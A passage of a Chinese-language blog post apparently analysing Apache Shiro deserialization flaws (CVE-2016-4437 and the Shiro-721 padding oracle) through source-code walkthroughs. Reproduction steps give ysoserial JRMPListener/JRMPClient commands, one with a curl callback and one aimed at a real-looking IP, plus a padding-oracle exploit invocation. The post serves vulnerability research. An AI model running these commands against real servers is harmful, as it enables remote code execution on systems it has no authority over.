src="https://i.loli.net/2020/03/07/nYdZpUwJ9WtRogc.jpg" alt="-w690"></p>
<p>在加密过程中需要关注的一个点，将iv向量放置在密文头部：org/apache/shiro/crypto/JcaCipherService.java<br><img src="https://i.loli.net/2020/03/08/FEYfb3ztTO6892r.jpg" alt="-w1111"></p>
<p>加密完成后，返回结果传入<code>rememberSerializedIdentity</code>函数，处理http请求，返回cookie到response中：<br><img src="https://i.loli.net/2020/03/07/zaL84qUgITr1pmD.jpg" alt="-w1018"></p>
<p>到这里cookie加密处理就结束了，再来跟一下是如何解密cookie的。</p>
<h4 id="解密"><a href="#解密" class="headerlink" title="解密"></a>解密</h4><p>org/apache/shiro/mgt/AbstractRememberMeManager.java#getRememberedPrincipals<br><img src="https://i.loli.net/2020/03/07/qD1Rblso8JFk5gE.jpg" alt="-w1083"><br>先从<code>getRememberedSerializedIdentity</code>函数获取cookie，base64解码：<br><img src="https://i.loli.net/2020/03/07/8eWULN2ctlARsnX.jpg" alt="-w913"></p>
<p>然后进入<code>convertBytesToPrincipals</code>函数，先是解密，接着反序列化<br><img src="https://i.loli.net/2020/03/07/aTyQLrH1BnCvjol.jpg" alt="-w1183"><br><img src="https://i.loli.net/2020/03/07/BOKl8EhoVzX75Dj.jpg" alt="-w1107"><br><img src="https://i.loli.net/2020/03/07/EiVnb4wKWfRt9ZJ.jpg" alt="-w1031"></p>
<h3 id="坑点：反序列化限制"><a href="#坑点：反序列化限制" class="headerlink" title="坑点：反序列化限制"></a>坑点：反序列化限制</h3><p>网上大部分文章都是拿common-collections2这调链来复现，畅通无阻。</p>
<p>我们来试试其他链，把gadget换成ysoserial5打shiro自带的<code>commons-collections-3.2.1</code>，会抛出这样一个错误：<br><img src="https://i.loli.net/2020/03/08/B1vORsbDQIf6PFq.jpg" alt="-w1260"></p>
<p>再把其组件拉出来单独试试：<br><img src="https://i.loli.net/2020/03/08/87TFURzvVHtYOeq.jpg" alt="-w1570"></p>
<p>调试分析一下：org/apache/shiro/io/DefaultSerializer.java<br><img src="https://i.loli.net/2020/03/08/9jbleZPJzkhadoR.jpg" alt="-w977"><br>跟进<code>ClassResolvingObjectInputStream</code>类：org/apache/shiro/io/ClassResolvingObjectInputStream.java<br><img src="https://i.loli.net/2020/03/08/G5tTdaBLfbsruYj.jpg" alt="-w1236"><br>他继承了<code>ObjectInputStream</code>类，重写了<code>resolveClass</code>方法，再来看一下原版<code>resolveClass</code>方法：<br><img src="https://i.loli.net/2020/03/08/Mb1BkSRdrjmqTE2.jpg" alt="-w1418"></p>
<p><code>Class.forName</code>和<code>ClassUtils.forName</code>的差别，来看看<code>ClassUtils</code>具体实现：org/apache/shiro/util/ClassUtils.java#forName<br><img src="https://i.loli.net/2020/03/08/xc8CH3kDXUog2nW.jpg" alt="-w1175"><br>shiro不是像原版那样通过<code>java.lang.Class</code>反射获取class，而是通过<code>ParallelWebappClassLoader</code>去加载class<br><img src="https://i.loli.net/2020/03/08/Rn74fdE3lviKpO9.jpg" alt="-w1125"><br>查了一些下资料，看到<a href="http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html" target="_blank" rel="noopener">orange师傅文章</a>评论中说不支持装载数组类型，这里没细跟原因了。<br><img src="https://i.loli.net/2020/03/08/gavj1AIZuzpHbhx.jpg" alt="-w1206"></p>
<h4 id="JRMP绕过"><a href="#JRMP绕过" class="headerlink" title="JRMP绕过"></a>JRMP绕过</h4><p><a href="http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html" target="_blank" rel="noopener">Orang师傅在文章</a>中一顿操作，发现JRMP可以避开上述限制，测试一下：</p>
<p>server：<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -cp ysoserial.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'curl http://x.x.x.x:8989'</span><br></pre></td></tr></table></figure></p>
<p>client:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar JRMPClient &apos;x.x.x.x:12345&apos;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://i.loli.net/2020/03/08/tsU1jzcnL76EokT.jpg" alt="-w659"></p>
<p>稍微调了一下EXP,大概能行的原因就是走的远程的class加载的，而不是像之前那样直接打本地：<br><img src="https://i.loli.net/2020/03/08/EiaT4phwcOBbCPt.jpg" alt="-w1507"></p>
<p><img src="https://i.loli.net/2020/03/08/S9Mjhr28QHYEu1f.jpg" alt="-w1239"></p>
<p>不过有一点比较困惑，用URLDNS打了没结果，但是直接用5链JRMP打却可以…</p>
<blockquote>
<p>这里手动膜@hu3sky师傅，教我手挖无数组的gadgets</p>
</blockquote>
<h3 id="挖掘3-2-1无数组gadget"><a href="#挖掘3-2-1无数组gadget" class="headerlink" title="挖掘3.2.1无数组gadget"></a>挖掘3.2.1无数组gadget</h3><blockquote>
<p>先挖坑，挖到再说吧</p>
</blockquote>
<h2 id="Shiro-Padding-Oracle攻击（Shiro-lt-1-4-1）"><a href="#Shiro-Padding-Oracle攻击（Shiro-lt-1-4-1）" class="headerlink" title="Shiro Padding Oracle攻击（Shiro &lt;= 1.4.1）"></a>Shiro Padding Oracle攻击（Shiro &lt;= 1.4.1）</h2><h3 id="漏洞复现-1"><a href="#漏洞复现-1" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>EXP用<a href="https://github.com/3ndz/Shiro-721" target="_blank" rel="noopener">3ndz/Shiro-721</a>，shiro的版本1.4.1配置过程参考上文。</p>
<p>yso生成个jrmpclient：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar JRMPClient &apos;47.93.226.148:12345&apos; &gt; JRMPClient</span><br></pre></td></tr></table></figure></p>
<p>服务端起一个jrmplistener<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -cp ysoserial.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections2 &apos;curl http://x.x.x.x:8989&apos;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 shiro_padding_oracle.py http://127.0.0.1:8088/samples_web_war_exploded/index.jsp [rememberMe的cookie] JRMPClien</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2020/03/09/poL4qfkhUxnFrBV.jpg" alt="-w1479"></p>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>先来看看这个版本对秘钥的处理：org/apache/shiro/mgt/AbstractRememberMeManager.java</p>
<p><img src="https://i.loli.net/2020/03/09/7OGrJ1jAdaNl9hm.jpg" alt="-w683"></p>
<p>一直跟进，可以看到将之前的硬编码秘钥换成了动态生成：<br><img src="https://i.loli.net/2020/03/09/uUbnDyr9w74SjYE.jpg" alt="-w878"></p>
<h4 id="padding错误"><a href="#padding错误" class="headerlink" title="padding错误"></a>padding错误</h4><p>在我们给rememberMe输入错误的padding后，经过上文提到的解密过程后，会抛出异常:/org/apache/shiro/crypto/JcaCipherService.class<br><img src="https://i.loli.net/2020/03/09/Bub7daNSGAPwxe1.jpg" alt="-w1309"><br>然后在org/apache/shiro/mgt/AbstractRememberMeManager.java#getRememberedPrincipals捕获<br><img src="https://i.loli.net/2020/03/09/wBSoNMXT1W4iRyd.jpg" alt="-w1341"></p>
<p>最后在org/apache/shiro/web/servlet/SimpleCookie.java中给返回包设置一个rememberMe的cookie，覆盖掉之前的值：<br><img src="https://i.loli.net/2020/03/09/Xouavkr5TKR62gy.jpg" alt="-w1179"></p>
<p>调用栈：<br><img src="https://i.loli.net/2020/03/09/qIze16hpPJ9nAYD.jpg" alt="-w594"></p>
<h4 id="padding正确，反序列化错误"><a href="#padding正确，反序列化错误" class="headerlink" title="padding正确，反序列化错误"></a>padding正确，反序列化错误</h4><p>在之前的padding oracle漏洞中，依靠控制前一块密文来伪造后一块的明文，根据Padding的机制，可构造出一个bool条件，从而逐位得到明文，然后逐块得到所有明文。</p>
<p>也就是说通过padding获取来伪造明文的，会改变前一块的密文，也就是会影响到解密的结果。我们来看shiro中对于解密结果的处理，在DefaultSerializer.class中进行反序列化时，会失败而抛出异常：<br><img src="https://i.loli.net/2020/03/09/eSDFNz5iod7fBPX.jpg" alt="-w1316"><br>而对于客户端而言，结果是一样的，都走到了AbstractRememberMeManager.java的异常处理：<br><img src="https://i.loli.net/2020/03/09/PF9fCX7my8A2n3p.jpg" alt="-w1187"><br>接着就是给客户端重置rememberMe的cookie。</p>
<h4 id="拼接序列化数据"><a href="#拼接序列化数据" class="headerlink" title="拼接序列化数据"></a>拼接序列化数据</h4><p>在<a href="https://xz.aliyun.com/t/3847" target="_blank" rel="noopener">gyyy:浅析Java序列化和反序列化</a>这篇文章中介绍了java序列化和反序列化的机制，关键点在于ObjectOutputStream是一个Stream，他会按格式以队列方式读下去，后面拼接无关内容，不会影响反序列化。</p>
<p>所以现在BOOL条件就出来了，拼接无关数据，padding 正确，能正常反序列化，padding错误抛出异常。</p>
<p>最后payload的构造就是不断的用两个block去padding得到intermediary之后，构造密文使得解密后得到指定明文，最后拼接到原有的cookie上。</p>
<p>exp: <a href="https://github.com/3ndz/Shiro-721" target="_blank" rel="noopener">https://github.com/3ndz/Shiro-721</a></p>
<h2 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h2><p>这段时间从密码学到shiro反序列化的几个版本漏洞分析，算法功底还得加强，接下来的时间研究一下shiro反序列化RCE的回显问题。</p>
<p>参考文章：</p>
<ul>
<li><a href="https://saucer-man.com/information_security/396.html" target="_blank" rel="noopener">分析调试apache shiro反序列化漏洞(CVE-2016-4437)</a>                                                    </li>
<li><a href="https://paper.seebug.org/shiro-rememberme-1-2-4/" target="_blank" rel="noopener">【漏洞分析】Shiro RememberMe 1.2.4 反序列化导致的命令执行漏洞</a></li>
<li><a href="http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html" target="_blank" rel="noopener">pwn-ctf-platform-with-java-jrmp-gadget</a>    </li>
<li><a href="https://bling.kapsi.fi/blog/jvm-deserialization-broken-classldr.html" target="_blank" rel="noopener">Exploiting JVM deserialization vulns despite a broken class loader</a>    </li>
<li><a href="https://www.anquanke.com/post/id/193165" target="_blank" rel="noopener">Shiro 721 Padding Oracle攻击漏洞分析</a></li>
<li><a href="https://p0sec.net/index.php/archives/126/" target="_blank" rel="noopener">p0:Shiro Padding Oracle Attack 反序列化</a></li>
</ul>

      
    </div>

    

    
    
    

	
    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Passer6y</li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://0day.design/2020/03/08/Shiro Padding Oracle Attack 反序列化/" title="Shiro 反序列化漏洞分析">http://0day.design/2020/03/08/Shiro Padding Oracle Attack 反序列化/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>true</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/漏洞分析/" rel="tag"><i class="fa fa-tag"></i> 漏洞分析</a>
          
            <a href="/tags/Java/" rel="tag"><i class="fa fa-tag"></i> Java</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/02/Tomcat-Ajp 协议漏洞分析(CVE-2020-1938)/" rel="next" title="Tomcat-Ajp 协议漏洞分析(CVE-2020-1938)">
                <i class="fa fa-chevron-left"></i> Tomcat-Ajp 协议漏洞分析(CVE-2020-1938)
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/03/11/CVE-2020-2555：weblogic反序列化漏洞分析/" rel="prev" title="CVE-2020-2555：weblogic反序列化漏洞分析">
                CVE-2020-2555：weblogic反序列化漏洞分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/21.jpg"
                alt="Passer6y" />
            
              <p class="site-author-name" itemprop="name">Passer6y</p>
              <p class="site-description motion-element" itemprop="description">A salty fish</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives">
                
                    <span class="site-state-item-count">42</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">13</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/passer6y" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:passer6y@d0g3.cn" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hpdoger.cn/" title="Hpdoger" target="_blank">Hpdoger</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://Hu3sky.github.io" title="Hu3sky" target="_blank">Hu3sky</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.0akarma.com/" title="0akarma" target="_blank">0akarma</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/H4lo" title="H4lo" target="_blank">H4lo</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/P1g3/" title="P1g3" target="_blank">P1g3</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://patrilic.top/" title="Patrilic" target="_blank">Patrilic</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ph0rse.me/" title="Ph0rse" target="_blank">Ph0rse</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://threezh1.com/" title="Threezh1" target="_blank">Threezh1</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.izgq.net/" title="ZGQ" target="_blank">ZGQ</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#基础"><span class="nav-number">1.</span> <span class="nav-text">基础</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Padding-Oracle-Attack"><span class="nav-number">1.1.</span> <span class="nav-text">Padding Oracle Attack</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#利用条件"><span class="nav-number">1.1.1.</span> <span class="nav-text">利用条件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#demo"><span class="nav-number">1.1.2.</span> <span class="nav-text">demo</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#防御"><span class="nav-number">1.1.3.</span> <span class="nav-text">防御</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CBC字节反转"><span class="nav-number">1.2.</span> <span class="nav-text">CBC字节反转</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2016-4437-Shiro-反序列化-Shiro-lt-1-2-4"><span class="nav-number">2.</span> <span class="nav-text">CVE-2016-4437: Shiro 反序列化(Shiro &lt;= 1.2.4)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#环境搭建"><span class="nav-number">2.1.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞复现"><span class="nav-number">2.2.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#代码分析"><span class="nav-number">2.3.</span> <span class="nav-text">代码分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#加密"><span class="nav-number">2.3.1.</span> <span class="nav-text">加密</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#解密"><span class="nav-number">2.3.2.</span> <span class="nav-text">解密</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#坑点：反序列化限制"><span class="nav-number">2.4.</span> <span class="nav-text">坑点：反序列化限制</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#JRMP绕过"><span class="nav-number">2.4.1.</span> <span class="nav-text">JRMP绕过</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#挖掘3-2-1无数组gadget"><span class="nav-number">2.5.</span> <span class="nav-text">挖掘3.2.1无数组gadget</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Shiro-Padding-Oracle攻击（Shiro-lt-1-4-1）"><span class="nav-number">3.</span> <span class="nav-text">Shiro Padding Oracle攻击（Shiro &lt;= 1.4.1）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞复现-1"><span class="nav-number">3.1.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞分析"><span class="nav-number">3.2.</span> <span class="nav-text">漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#padding错误"><span class="nav-number">3.2.1.</span> <span class="nav-text">padding错误</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#padding正确，反序列化错误"><span class="nav-number">3.2.2.</span> <span class="nav-text">padding正确，反序列化错误</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#拼接序列化数据"><span class="nav-number">3.2.3.</span> <span class="nav-text">拼接序列化数据</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#最后"><span class="nav-number">4.</span> <span class="nav-text">最后</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Passer6y</span>

  

  
</div>









<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共83.5k字</span>
</div>

<span id="busuanzi_container_site_pv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站总访问量<span id="busuanzi_value_site_pv"></span>次
  </span>
  <span id="busuanzi_container_site_uv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站访客数<span id="busuanzi_value_site_uv"></span>人次
  </span>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>
























  



  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/gh/theme-next/theme-next-reading-progress@1/reading_progress.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  








  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: false,
        appId: '3Jm4JutlBzR7fb3fxICb50pS-gzGzoHsz',
        appKey: 'TDRlM3HCI03SteHoOtVxJIMS',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
